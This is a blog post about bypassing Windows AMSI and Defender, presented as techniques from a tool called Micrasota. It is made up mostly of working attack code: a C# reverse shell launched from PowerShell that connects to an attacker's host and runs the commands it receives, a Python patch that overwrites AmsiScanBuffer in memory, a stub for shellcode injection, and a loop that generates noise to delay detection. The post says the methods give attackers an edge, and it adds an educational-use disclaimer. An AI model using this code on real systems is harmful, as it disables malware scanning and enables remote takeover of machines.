New AMSI bypass 2025
AMSI Bypass Techniques: Evading Windows Defender with Modern Methods
Introduction
Hello Microsoft team and fellow cybersecurity enthusiasts,
In this post, I’ll walk you through the process of bypassing the Antimalware Scan Interface (AMSI) on Windows. We’ll explore traditional evasion methods, their limitations, and how modern, more sophisticated techniques—especially those implemented using a tool I developed called Micrasota—can be used to defeat AMSI and Windows Defender effectively.
What is AMSI?
AMSI is a Microsoft security interface through which script hosts such as PowerShell, CMD, WScript, and CScript hand content to the installed antimalware provider for scanning before it runs, so that malicious scripts can be blocked. While powerful, AMSI has several design limitations that make it vulnerable to certain evasion techniques.
Traditional Methods vs. Micrasota
Old-school bypass techniques include:
- Code fragmentation
- Variable manipulation
- Instruction concatenation
These methods were once effective but are now easily detected by Windows Defender and modern antivirus solutions.
The Micrasota tool uses more advanced, multi-layered strategies. It leverages C# and Python code execution through PowerShell, enabling dynamic in-memory execution and deeper evasion of signature and behavioral detection.
AMSI Bypass Techniques
1. Reverse Shell Using C# Injected from PowerShell
```powershell
Add-Type -TypeDefinition @"
using System;
using System.Net.Sockets;
using System.IO;
using System.Diagnostics;

public class RevShell {
    public static void Connect() {
        string host = "$LHOST";
        int port = $LPORT;
        try {
            TcpClient client = new TcpClient(host, port);
            NetworkStream stream = client.GetStream();
            StreamReader reader = new StreamReader(stream);
            StreamWriter writer = new StreamWriter(stream) { AutoFlush = true };
            string cmd;
            while ((cmd = reader.ReadLine()) != null) {
                Process proc = new Process();
                proc.StartInfo.FileName = "cmd.exe";
                proc.StartInfo.Arguments = "/c " + cmd;
                proc.StartInfo.RedirectStandardOutput = true;
                proc.StartInfo.RedirectStandardError = true;
                proc.StartInfo.UseShellExecute = false;
                proc.StartInfo.CreateNoWindow = true;
                proc.Start();
                writer.WriteLine(proc.StandardOutput.ReadToEnd());
                writer.WriteLine(proc.StandardError.ReadToEnd());
            }
            client.Close();
        } catch (Exception) { }
    }
}
"@ -Language CSharp
```
2. Disabling AMSI via Python from PowerShell
```powershell
$pycode = @"
import ctypes
kernel32 = ctypes.windll.kernel32
amsi = ctypes.windll.amsi
amsi_scan_buffer = amsi.AmsiScanBuffer
func_addr = ctypes.cast(amsi_scan_buffer, ctypes.c_void_p).value
old_protect = ctypes.c_uint32(0)
kernel32.VirtualProtect(func_addr, 1, 0x40, ctypes.byref(old_protect))
patch = (ctypes.c_char * 1)(b'\xC3')
ctypes.memmove(func_addr, patch, 1)
kernel32.VirtualProtect(func_addr, 1, old_protect.value, ctypes.byref(old_protect))
print("AMSI Bypass successful!")
"@
python -c $pycode
```
3. In-Memory Shellcode Injection via C#
```csharp
[DllImport("kernel32.dll")]
static extern IntPtr VirtualAlloc(...);

[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(...);

public static void RunShell() {
    byte[] shellcode = new byte[] { /* Your Payload */ };
    IntPtr addr = VirtualAlloc(...);
    memcpy(addr, shellcode, (UIntPtr)shellcode.Length);
    CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out _);
}
```
4. Delaying Detection: Wasting Time with Noise
```powershell
for ($i = 0; $i -lt 100; $i++) {
    Get-Process
    Get-Service
    Get-EventLog -LogName Application
    Get-Date
}
```
Conclusion
The Micrasota tool, alongside the advanced techniques demonstrated above, provides an effective way to bypass modern AMSI protections. Combining PowerShell, C#, and Python execution within a single framework gives attackers the edge to bypass behavioral detection systems like Defender.
However, it’s important to stress: these techniques are shared for educational and ethical research purposes only. Understanding vulnerabilities is a step toward improving defense—not enabling unauthorized attacks.
Disclaimer
This post is for educational and research purposes only. Any misuse or illegal activity inspired by this content is strictly discouraged and may result in criminal charges.
In the next blog, I’ll explore the Micrasota Framework in depth and demonstrate how it automates AMSI bypass and payload execution across various layers. Stay tuned!